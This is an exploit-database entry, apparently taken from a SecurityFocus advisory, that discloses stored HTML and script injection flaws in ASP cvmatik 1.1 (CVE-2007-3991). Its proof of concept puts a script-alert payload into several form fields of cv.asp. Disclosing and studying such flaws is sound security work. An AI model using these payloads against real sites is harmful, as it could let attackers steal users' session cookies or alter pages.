ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities
Author: GeFORC3
type: webapps
platform: asp
port:
date_added: 2007-07-23
date_updated: 2013-12-16
verified: 1
codes: CVE-2007-3991;OSVDB-36471
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/25008/info
Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Asp cvmatik 1.1 is vulnerable.
<html><head></head><body>1-http://www.example.com/cv.asp
You write xss code in page's text box
Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet <script>alert("G3");</script>
or
Askerlik <script>alert("G3");</script>
or
GSM <script>alert("G3");</script>
etc...
Press to "tamam"(ok) button.
2-next page
</body></html>